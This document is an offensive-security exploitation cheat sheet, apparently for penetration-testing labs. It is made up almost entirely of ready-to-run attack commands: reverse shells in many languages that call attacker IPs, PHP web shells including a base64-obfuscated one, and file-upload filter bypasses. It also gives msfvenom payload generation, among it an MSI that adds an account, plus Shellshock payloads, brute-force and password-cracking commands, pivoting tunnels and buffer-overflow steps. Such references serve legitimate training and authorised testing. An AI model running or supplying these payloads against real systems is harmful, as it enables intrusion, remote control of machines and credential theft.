Exploitation Cheat Sheet
Reverse Shells
Netcat
nc -e /bin/bash IPADDRESS PORT
nc -c /bin/bash IPADDRESS PORT
Netcat without -e/-c (the OpenBSD netcat shipped on most Linux distributions has neither; nc.traditional and ncat do) — use a named pipe instead:
rm -f /var/tmp/backpipe
mknod /var/tmp/backpipe p
nc IPADDRESS PORT 0</var/tmp/backpipe | /bin/bash 1>/var/tmp/backpipe
Bash
bash -i >& /dev/tcp/10.0.0.18/8080 0>&1
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
#TCP
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.22",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
#UDP-use socat UDP listener
python -c 'import socket,pty,os;lhost = "10.10.15.80"; lport = 100; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv("HISTFILE","/dev/null"); pty.spawn("/bin/bash"); s.close()'
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Socat
#Listener
socat file:`tty`,raw,echo=0 tcp-listen:4444
#Victim
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
#UDP Listener
socat file:`tty`,echo=0,raw udp-listen:100
Telnet
# Using Telnet and a created node
mknod /var/tmp/backpipe p; telnet 10.11.0.55 53 0</var/tmp/backpipe | /bin/bash 1>/var/tmp/backpipe
# Using two Telnet connections: listen on both ports (53 and 54) — commands typed into the first listener are executed, their output comes back on the second
telnet 10.11.0.55 53 | /bin/bash | telnet 10.11.0.55 54
OpenSSL Encrypted Reverse Shell
# Generate certificate:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
# Listener:
openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT>
# Reverse Shell:
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s
Upgrade Reverse Shell to Support tab completion/hot keys
# In reverse shell (use python3 if python is not installed)
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
# In Kali
stty raw -echo
fg
# In reverse shell-optional
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>
PHP
# PHP reverse shell
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
# Simple PHP shell.php
<?php echo shell_exec("bash -i >& /dev/tcp/192.168.226.128/443 0>&1");?>
#PHP popen
<?php popen("(nc -nv $_GET[0] 443 -e /bin/bash)2>&1","r"); ?>
URL:http://example.com/malicious-shell.php?0=10.0.0.10
#PHP fsockopen
<?php fsockopen("10.11.0.10", 443);`/bin/sh -i <&3 >&3 2>&3`; ?>
#PHP Reverse Shell with Base64 (the blob below decodes to the Perl one-liner above, hard-coded to 10.11.0.53:1234 — re-encode it with your own IP/port before use)
<?php shell_exec(base64_decode("cGVybCAtZSAndXNlIFNvY2tldDskaT0iMTAuMTEuMC41MyI7JHA9MTIzNDtzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCJ0Y3AiKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKCRwLGluZXRfYXRvbigkaSkpKSl7b3BlbihTVERJTiwiPiZTIik7b3BlbihTVERPVVQsIj4mUyIpO29wZW4oU1RERVJSLCI+JlMiKTtleGVjKCIvYmluL3NoIC1pIik7fTsn"))?>
PAYLOAD: <?=`$_GET[0]`?>
URL: http://website.com/cmd.php?0=
PAYLOAD: <?=$_GET[0]($_POST[1]);?>
URL: curl 'http://website.com/cmd.php?0=shell_exec' -d '1=id'   (function name in the GET parameter, its argument in the POST body)
PAYLOAD: <?php extract($_GET); $a($b)?>
URL: http://example.com/shell.php?a=system&b=id
PAYLOAD: <?php system($_GET["cmd"]); ?>
URL: http://example.com/shell.php?cmd=id
PAYLOAD: <?php echo shell_exec(base64_decode($_GET["cmd"])); ?>   (send the command base64-encoded; without echo the output is never returned)
SSH
Reverse Shell
This requires credentials on both machines (the remote host must be able to SSH to your box) and works from NAT-ed environments; the port opened by -R listens only on the attacker's loopback unless sshd has GatewayPorts enabled.
#Executed on remote host.
ssh -NR 60000:localhost:22 user@10.11.0.55
#Executed on attacking machine.
ssh <remote-host-user>@localhost -p 60000   (credentials for the remote host, not for your own box)
Have SSH execute a command before the remote shell is loaded
ssh user@10.11.0.100 -t "/bin/sh"
Try to get SSH to not load the shell's rc files (--noprofile alone skips only the login profile; an interactive bash still reads ~/.bashrc unless --norc is given too)
ssh user@10.11.0.100 -t "bash --noprofile --norc"
Shellshock via SSH (only works when the account is restricted by ForceCommand or an authorized_keys command=, which places the supplied command in the SSH_ORIGINAL_COMMAND environment variable that a vulnerable bash parses as a function definition)
ssh user@10.11.0.100 -t "() { :; }; /bin/bash"
File Transfers
php ftp sequence to transfer netcat on linux
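<?php /* Build an ftp(1) batch file through a PHP web shell and run it to pull netcat
onto the target. The first line must be quoted: in bash an unquoted `21>` is a
redirection of file descriptor 21, so the "open" line would never reach the file
and every later append would land in a script with no server to connect to. */ ?>
<?php echo shell_exec("echo 'open 192.168.42.102 21' > /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo 'user offsec lab' >> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo binary >> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo 'get netcat /usr/local/databases/netcat' >> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo bye >> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("ftp -n < /usr/local/databases/ftp.txt");?>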
Windows FTP via text file
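:: Build an ftp(1) script from cmd.exe and run it non-interactively.
:: Mind the space before ">" on the first line: cmd treats a digit glued to a
:: redirection operator as a file handle, so "21> ftp.txt" is parsed as handle 1
:: and the digit is dropped from the echoed text. ftp.exe ignores the trailing
:: space the fix leaves behind. wget.exe must already be in the FTP user's root
:: on the attacker box.
echo open 192.168.1.101 21 > ftp.txt
echo USER username>> ftp.txt
echo mypassword>> ftp.txt
echo bin>> ftp.txt
echo GET wget.exe>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt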
Powershell
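:: Write a minimal PowerShell downloader from cmd.exe (cmd echoes the "$" and the
:: quotes literally, so the lines land in wget.ps1 unexpanded) and run it with
:: the execution policy bypassed. The original also saved $pwd into $storageDir,
:: which nothing used, so that line is gone. Replace IPADDRESS, file.exe and
:: output-file.exe before running.
echo $webclient = New-Object System.Net.WebClient > wget.ps1
echo $url = "http://IPADDRESS/file.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1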
TFTP, usually enabled by default in Server 2003, XP, and below
Start tftp server on Kali
atftpd --daemon --port 69 /tftp   (the daemon is atftpd, not aftpd; place the files to serve in /tftp)
Transfer files from Kali to Windows (from windows terminal)
tftp -I IPADDRESS GET nameoffile.exe
FreeBSD
fetch http://IPADDRESS/filename
Command Injection
command1 && command2 that will run command2 if command1 succeeds.
command1 || command2 that will run command2 if command1 fails.
command1 ; command2 that will run command1 then command2.
command1 | command2 that will run command1 and send the output of command1 to command2
$(command) or `command` — runs command and substitutes its output inline; a newline (%0a in a URL) also works as a separator
# Windows
&
Bypassing File Uploads
# Bypass client side checking
Submit Request through burp and change file extension with intercept from .jpg back to .php
# Double Extension Injection
shell.jpg.php
# Invalid Extension Bypass
shell.php.fake
#Bypass Content-Type Verification
Intercept in burp and change Content-Type to image/gif, image/jpg, or image/png
# Null byte Injection (PHP < 5.3.4 only; later versions reject NUL bytes in file paths)
shell.php%00.jpg
Or edit the hex in the request in burp to 00
# Upload .htaccess
# Example .htaccess contains: AddType application/x-httpd-php .jpg
# This instructs Apache to run .jpg files as php, then upload malicious jpg
# Bypass blacklists
PHP, pHp, PhP, pHP, php3, php4, php5, php7, phtml, etc
# Content Length Bypass
Use a small payload: <?system($_GET[0]);   (the bare <? tag needs short_open_tag=On; <?=`$_GET[0]`; works regardless on PHP 5.4+)
Or fill file with lots of junk
# Image Header in File
GIF89a;
<?php INSERT PAYLOAD ?>
Word Press
Once logged into the interface try to get reverse shell by either editing an existing theme, uploading a new theme, or uploading a new plugin.
Editing a theme, paste in your own reverse shell code and browse to it, normally it's under http://IPADDRESS/wp-content/themes/nameoftheme/page.php
If uploading as a plugin, make sure the shell.php file has the appropriate plugin comments or it will "fail" when uploading. Comments should look like this:
/*
Plugin Name: WordPress Shell
Plugin URI: https://hackerman.com
Description: blah blah
Author: Hackerman
Version: 0.2
Author URI: https://hackerman.com
*/
Then browse to the plugin page, normally: http://IPADDRESS/wp-content/plugins/shell/shell.php
Generating Payloads
PHP reverse shell payload
msfvenom -p php/reverse_php LHOST=YOURIPADDRESS LPORT=443 > shell.php
Windows reverse shellcode for python script buffer overflow
msfvenom -p windows/shell_reverse_tcp LHOST=YOURIPADDRESS LPORT=443 -f c -e x86/alpha_mixed -b "\x00\x04\xcd\x77\x3f"
Windows bind shellcode for python script buffer overflow
msfvenom -p windows/shell_bind_tcp LPORT=444 -f c -e x86/shikata_ga_nai -b "\x00\x04\xcd\x77\x3f"
Meterpreter exe with reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOURIPADDRESS LPORT=4444 -f exe > meterpreter.exe
64-bit
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.12.120 LPORT=4444 -f exe > met64.exe
WAR file for Apache Tomcat.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=YOURIPADDRESS LPORT=443 -f war > shell.war
to find the malicious JSP, extract shell.war and browse to the .jsp file inside it (it is a JSP page, not a .js file)
jar -xvf shell.war
Windows MSI
msfvenom -f msi-nouac -p windows/adduser USER=hackerman PASS=password -o add_user.msi
Javascript
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.121 LPORT=443 -f js_le
Linux elf binary
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.121 LPORT=443 -b "\x00" -f elf -o filename
Brute Forcing
MSSQL
hydra -l sa -P /usr/share/wordlists/rockyou.txt IPADDRESS mssql
medusa -h IPADDRESS -u sa -P /usr/share/wordlists/rockyou.txt -e nsr -m mssql -nPORTNUMBER
RDP
ncrack -u administrator -P /usr/share/wordlists/rockyou.txt -p 3389 IPADDRESS
SSH
hydra -l root -P /usr/share/wordlists/rockyou.txt IPADDRESS ssh
medusa -h IPADDRESS -u root -P /usr/share/wordlists/rockyou.txt -e nsr -m ssh
Word Press
hydra -l admin -P /usr/share/wordlists/rockyou.txt IPADDRESS http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:S=Location\:.*/wp-admin/" -e nsr
FTP
hydra -l admin -P /usr/share/wordlists/rockyou.txt IPADDRESS -e nsr ftp
HTTP POST
hydra -l admin -P /usr/share/wordlists/rockyou.txt IPADDRESS http-post-form "/login.php:username=^USER^&password=^PASS^:FAILMESSAGE" -e nsr
Password Cracking
hashcat -m 1800 -a 0 -o cracked.txt --remove hashes.txt rockyou.txt   (-m 1800 = sha512crypt; never point -o at the input hash file, and note --remove rewrites hashes.txt as hashes are cracked)
Identify hashes
hash-identifier
SSH passphrase
ssh2john id_rsa > sshtocrack
john --wordlist=/usr/share/wordlists/rockyou.txt sshtocrack
SSH tunnels and Port Forwarding
Port forward with plink on Windows
plink.exe -l root -R 445:127.0.0.1:445 YOURIPADDRESS
Meterpreter port forward
portfwd add -l 9090 -p 9090 -r TARGETIP
create dynamic ssh tunnel over port for use with proxychains
ssh -f -N -D 8080 root@IPADDRESS
Proxychains to open up another SSH tunnel through pivot machine hopping
proxychains4 ssh -f -N -D 8090 hackerman@10.1.1.1 -p 222
Send reverse ssh tunnel to your machine
ssh -R 8090:localhost:8090 YOURIPADDRESS
ShellShock
() { :; };
Reverse shell (quote the -c argument; unquoted, the redirections apply to the outer bash instead of the interactive one)
() { :; }; /bin/bash -c '/bin/bash -i >& /dev/tcp/YOURIPADDRESS/PORT 0>&1' &
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80
Buffer Overflow
Generate unique pattern using metasploit module
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
Find unique pattern that EIP displays
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 42376942
Check for bad chars, insert into script then check debugger for any breaks in sequence
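# Bad-character probe for the buffer-overflow workflow. Every byte value except
# \x00 is listed: a NUL terminates C strings, so it is assumed bad and left out.
# The fragments are bytes literals (b"..."), so the value concatenates with a
# b"..." buffer and goes over the socket byte-for-byte on Python 3; on Python 2
# bytes is just str, so nothing changes there. Send it in place of the shellcode,
# follow ESP in the debugger, and delete the first byte that is missing or
# mangled (and the one right after it, if that was corrupted too); repeat until
# the memory dump matches this sequence.
badchars = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)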
Find a JMP ESP address ("\xff\xe4") using mona.py in the debugger — pick a module without ASLR/rebase/SafeSEH (see !mona modules); !mona jmp -r esp -m nameofprogram.dll is the equivalent shortcut
!mona find -s "\xff\xe4" -m nameofprogram.dll